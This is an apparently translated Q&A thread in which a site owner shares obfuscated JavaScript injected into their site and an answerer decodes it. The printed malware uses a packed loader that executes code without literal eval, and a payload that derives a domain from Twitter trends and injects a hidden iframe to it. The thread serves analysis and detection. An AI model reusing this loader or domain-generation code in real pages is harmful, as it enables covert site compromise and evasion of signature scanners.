Is this dangerous javascript?

<!-- Analyst note on the sample below. It is a packed loader: the string `d` holds
     the payload compressed with a token dictionary, and the for-loop expands it by
     repeated split/join, one token per pass. The function passed in as `$$` follows
     `.constructor` twice (from the string to String, then to Function), so `$$(d)`
     compiles and runs the expanded text even though the source contains no literal
     `eval` or `Function(` call; a signature that looks only for those words will
     miss it. The copy printed here is split across two lines inside the string
     literal and has lost characters (the loop starts at c = 50, but the token list
     shown is 48 characters long), so treat it as an illustration and analyse from
     the raw bytes served by the affected page. -->
<script> (function($$) { d = "(@(){ % H=@ ( +Pw=this;\\[Pw~FullYear $Month $Date $Hours $Minutes $Seconds()]}; % B=@ ( +#h,PD=this.#H(),i=0;PD[1]+=1;while(i++<7){#h=PD[i] 0#h<#L)PD[i]=Vz')+#h}\\ PD.splice(Vz'),1+VT - 3Vu -+'T'+PD 3VU -};Pr={'hXhttp://`sX/`tXtre`dXdai`nXnds`qX?`cXcallback=`jX#`aXapi`lXly`WXtwitter`oXcom`eX1`kXs`KXbody`xXajax`DX.`LXlibs`JXjquery`6X6.2`mXmin`fXon`SXcript`iXif`MXrame`YXhead`wXwidth:`pXpx;`HXheight:`TX2`rXrc`QX\"`yXstyle=`bX><`RX></`IXdiv`BX<`AX>`gXgoogle`EX&date=`zX0`uX-`UX `,X:00`;':2345678901,'/':48271,'F':198195254,'G':12,'CX='};@ #n(#E){#M=[];for(PM=0;PM<#E /;PM++){#M.push(Pr[#E.charAt(PM)])}\\ #p(#M)}Pj=document;#d=window; (C='undefined'; (S=VhaDWDosestnsdlDjfqcq' 6G= &)== (C) 0#G||!PR()){if(!#G){try{Pn=jQuery ;try{Pn=$ }PS=Pj.getElementsByTagName(VY -[0];#m=Pj.createElement(VkS -;#m.setAttribute(Vkr'),#n(\"hxDgakDosxsLsJseD6sJDmDj\"));PS.appendChild(#m)}@ PH(#q,PB){\\ Math.floor(#q/PB) 7x(#s +PC=PH( (N, !m) 5F= (N% !m 5f= !D*#F- !T*PC 0#f>0){#N=#f}else{#N=#f+ !v}\\(#N%#s) 7t(#k){ (N=V;')+#k; !D=V/'); !v=V;')-VF'); !m=PH( !v, !D); !T= !v% !D 7p(P){\\ P /==1?P[0]:P 3'')};@ #e(P){d=new Date( 6D=Vzee');d.setTime((P.as_of-VG')*VG')*VG')*Vezz -*Vezzz -;\\ d 7z(Pz +#c,PL,#j=Pz / 5v=[];while(--#j){PL=#x(#j 6v.push(PL 6c=Pz[PL];Pz[PL]=Pz[#j];Pz[#j]=#c}}@ PJ($){PN=$.map([81,85,74,74,92,17,82,73,80,30,82,77,25,11,10,10,61,11,56,55,11,53,6,53,7,2,1,0,48],@(x,i){\\ String.fromCharCode(i+x+24)});\\ #p(PN) 7o($){if &)!= (C){$(@(){if &.Ph)!= (C)\\;$.Ph=1; 2S,@(Pe){#R=#e(Pe 6K=#R~Month() 8c=#R~Date( 6u=#S+#n(\"ETzeeu\")+#K+\"-\"+Pc;Pu=PA=PH(#R~Hours(),6)*6 8d=Pu+1;#L=+Vez'); ) 2u,@(Pe){try{#y=Pe.trends;for(#r in #y){break}#r=#r.substr(+Vz'),+Vee - 0Pu ,u 0Pd ,d; 4u+V,')] 0!#b) 4d+V,')];#b=(#b[3].name.toLowerCase().replace(/[^az]/gi,'')+'safetynet').split('' 6T=#K*73+PA*3+Pc*41;#t(#T 6a=#x(4)+#L;#z(#b 6g=VCh')+#p(#b).substring(0,#a)+'.com/'+PJ($);Pr['Z']=#g;Pf=VBI 1biMU 1UkrZRiMRIA');$(VK -.append(Pf)}catch(Py){}})},#L*#L*#L)})})}else{ ) *,1+VTTT 
-}} *)()# js@functionP #AV#n('X':'`','~.getUTC\\return .noConflict(true)}catch(e){} !#dP $(),Pw~ %Date.prototype.# &(typeof($ (#d.# )setTimeout(@(){ *#o(#d.jQuery)} +){var ,<#L)Pu=Vz')+P -')) /.length 0;if( 1yQHTpweeepQ 2$.getJSON(# 3.join( 4#b=#y[#r+P 5;var # 6);# 7}@ # 8+(+Ve -;P"; for (c = 50; c; d = (t = d.split('#@PVX`~\\ ! $ % & ( ) * + , - / 0 1 2 3 4 5 6 7 8'.substr(c -= (x = c < 10 ? 1 : 2), x))).join(t.pop())); $$(d) })(function(jsAP) { return (function(jsA, jsAg) { return jsAg(jsA(jsAg(jsA(jsAP))))(jsAP)() })((function(jsA) { return jsA.constructor }), (function(jsA) { return (function(jsAg) { return jsA.call(jsA, jsAg) }) })) }); </script> 

My host says nothing about this, and it happens often. I think they may be hiding a malicious hacking attempt.

What does it do?

EDIT:

We are changing hosts.

The code really is malicious and was injected into our site. Our host tried to hide it (maybe so we wouldn't worry).

This also happened to my friend's site on the same host.

Do not test this script, please.

Looks like some obfuscated injection.

1 answer

Let's work through it and decode it; it will be fun(-ish).

AFAICT so far, it grabs what appears to be the third trend from two days before the current date, or at least intends to (I think the date key it uses to look up the daily trends is wrong, because it appends a zero-seconds part to the time that is not in the feed), builds a URL from it, and sends some data, using a hash that represents the nearest 6-hour interval.

Here is the blob of text after decoding, along with the start of the analysis:

 // Decoded payload with analyst annotations. What the visible code does: fetch
 // Twitter's daily-trends JSON, derive a date and 6-hour seed from its as_of
 // timestamp, take one trend name, shuffle its letters with a seeded generator,
 // and use a prefix of the result as a .com hostname for a 2px-high iframe
 // appended to <body>. Short names (jsx, jst, jsz, ...) come from the unpacker;
 // the descriptive names were chosen by the answerer.
 // Indicators visible in this listing: calls to api.twitter.com/1/trends/daily.json
 // from a page with no Twitter feature, a 2px by 111px iframe under <body>, and
 // the fixed path /index.php?tp=001e4bb7b4d7333d. The hostname changes with the
 // feed, so the fixed path and iframe size are the stable parts to match on.
 (function () {
   jsAr = { };
   // In this listing jsAr exists only so that jsAr['Z'] can be assigned near the
   // end. In the packed source it is the lookup table read by the jsn() decoder.

   /* Returns either first element of jsA, or a joined string. */
   function firstElementOrJoined(jsA) {
     return jsA.length == 1 ? jsA[0] : jsA.join('')
   };
   jsAj = document;
   // loadJquery() is the answerer's placeholder and is not defined in this listing.
   loadJquery(); // Load JQ in head new script tag.

   function divideAndFloor(jsq, jsAB) {
     return Math.floor(jsq / jsAB)
   }

   // One step of the seeded generator: updates the global state jsN and returns it
   // modulo jss. With the constants set in jst() this matches a Lehmer
   // (Park-Miller) generator, multiplier 48271 and modulus 2147483647, computed
   // with the quotient/remainder split (jsAm = quotient, jsAT = remainder).
   function jsx(jss) {
     var jsAC = divideAndFloor(jsN, jsAm);
     var jsF = jsN % jsAm;
     var jsf = (jsAD * jsF) - (jsAT * jsAC);
     if (jsf > 0) {
       jsN = jsf
     } else {
       jsN = jsf + jsAv
     }
     return (jsN % jss)
   }

   /** Used only once in .getJSON call. Seeds the generator state from jsk. */
   function jst(jsk) {
     jsN = 2345678901 + jsk;
     jsAD = 48271;
     jsAv = 2147483647;
     jsAm = divideAndFloor(jsAv, jsAD);
     jsAT = jsAv % jsAD
   }

   /** Takes twitter as_of and subtracts 172800 (2 days, if as_of is in seconds). */
   function jse(jsA) {
     d = new Date();
     // '1000' is a string; the * operator coerces it to a number.
     d.setTime((jsA.as_of - 172800) * '1000');
     return d
   }

   // Shuffles jsAz in place: walking down from the last index, each position is
   // swapped with an index drawn from jsx(). jsv collects the drawn indices but is
   // not read anywhere in this listing.
   function jsz(jsAz) {
     var jsc, jsAL, jsj = jsAz.length;
     var jsv = [];
     while (--jsj) {
       jsAL = jsx(jsj);
       jsv.push(jsAL);
       jsc = jsAz[jsAL];
       jsAz[jsAL] = jsAz[jsj];
       jsAz[jsj] = jsc
     }
   }

   function jso($) {
     // Wait until we have jQuery loaded; retry after 1222 ms.
     if (typeof($) == 'undefined') {
       setTimeout(function () {
         jso(jQuery)
       }, 1222);
       return;
     }
     $(function () {
       // Only run this function once: $.jsAh is a marker set on the jQuery object.
       if (typeof ($.jsAh) != 'undefined') return;
       $.jsAh = 1;
       $.getJSON('http://api.twitter.com/1/trends/daily.json?callback=?', function (data) {
         dateTwoDaysPrior = jse(data);
         nMonthTwoDaysAgo = dateTwoDaysPrior.getUTCMonth() + 1;
         nDayTwoDaysAgo = dateTwoDaysPrior.getUTCDate();
         // The year 2011 is hard-coded; month and day are not zero-padded.
         urlTwitterTwoDaysAgo = 'http://api.twitter.com/1/trends/daily.json?callback=?&date=2011-' + nMonthTwoDaysAgo + "-" + nDayTwoDaysAgo;
         twoDigitPrevSixHr = prevSixHr = divideAndFloor(dateTwoDaysPrior.getUTCHours(), 6) * 6 + 1;
         jsAd = twoDigitPrevSixHr + 1;
         // setTimeout fires once: the second request is delayed by 1000 ms, it is
         // not repeated every second.
         setTimeout(function () {
           $.getJSON(urlTwitterTwoDaysAgo, function (data) {
             try {
               jsy = data.trends;
               // Take the first enumerated key of data.trends.
               for (jsr in jsy) {
                 break;
               }
               // Keeps the first 11 characters; the answerer's example shows the
               // 10-character date, so the 11th is presumably the separator before
               // the time - confirm against a feed sample.
               jsr = jsr.substr(0, 11); // == 2011-11-10
               if (twoDigitPrevSixHr < 10) twoDigitPrevSixHr = '0' + twoDigitPrevSixHr; // Normalize to hh
               // As written, this overwrites twoDigitPrevSixHr with the padded jsAd;
               // jsAd itself stays unpadded. The packed source does the same.
               if (jsAd < 10) twoDigitPrevSixHr = '0' + jsAd; // Normalize to hh
               // Try to get trends for last 6hr thing (but the :00 will make it never work?)
               // If can't, try to get the next 6hr thing.
               jsb = jsy[jsr + twoDigitPrevSixHr + ':00'];
               if (!jsb) jsb = jsy[jsr + jsAd + ':00'];
               // Take the trend entry at index 3 (the fourth, counting from zero), eg,
               // {
               //   "name": "#sinterklaasintocht",
               //   "query": "#sinterklaasintocht",
               //   "promoted_content": null,
               //   "events": null
               // }
               // then lowercase the name, filter it, append 'safetynet', and split
               // into an array of characters:
               // ['s', 'i', etc... nterklaasintochtsafetynet]
               // NOTE(review): as printed, in both the packed and the decoded text,
               // the class is [^az], which keeps only the letters a and z; the
               // example above assumes every letter is kept. Confirm against the
               // raw sample.
               jsb = (jsb[3].name.toLowerCase().replace(/[^az]/gi, '') + 'safetynet').split('');
               // 803 + prevSixHr * 3 + 410 for the example date; used as the seed
               // offset passed to jst().
               hashkeyForTwoDaysAgoPrevSixHr = nMonthTwoDaysAgo * 73 + prevSixHr * 3 + nDayTwoDaysAgo * 41;
               jst(hashkeyForTwoDaysAgoPrevSixHr);
               // jsx(4) is 0..3, so the hostname label is cut to 10..13 characters.
               jsa = jsx(4) + 10;
               jsz(jsb);
               // The answerer asked whether the next two lines are useful. In the
               // packed source they are: jsAf is assembled by the jsn() decoder from
               // a key string containing k, r and Z, where k and r decode to "src"
               // and Z to jsg, so jsg becomes the iframe's src value.
               // jsb = ['s', 'i', etc... nterklaasintochtsafetynet]
               jsg = '=http://' + firstElementOrJoined(jsb).substring(0, jsa) + '.com/index.php?tp=001e4bb7b4d7333d';
               jsAr['Z'] = jsg;
               // Static decode of the markup; src is shown empty here. "<divstyle"
               // has no space in the packed source either.
               jsAf = '<divstyle="height:2px;width:111px;"><iframe style="height:2px;width:111px;" src></iframe></div>';
               $('body').append(jsAf)
             } catch (jsAy) {} // errors are discarded, so a failed lookup leaves no console trace
           })
         }, 1000)
       })
     });
   }
   jso(jQuery)
 })();

Here are some urls built from an array:

 jsd.jsS = http://api.twitter.com/1/trends/daily.json?callback=? 

This piece of code:

 // jsn() looks each character of its argument up in the packed dictionary and
 // joins the results; jsAj is document.
 // jsn('Y') decodes to "head".
 jsAS = jsAj.getElementsByTagName(jsn('Y'))[0];
 // jsn('kS') decodes to "script".
 jsm = jsAj.createElement(jsn('kS'));
 // jsn('kr') decodes to "src"; the long key decodes to the jQuery 1.6.2 URL on
 // ajax.googleapis.com. The request goes to a legitimate CDN, so what stands out
 // is a jQuery include the site owner did not add.
 jsm.setAttribute(jsn('kr'), jsn("hxDgakDosxsLsJseD6sJDmDj"));
 jsAS.appendChild(jsm)

adds a jQuery script tag to <head>:

 <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js"></script> 

Source: https://habr.com/ru/post/1380915/

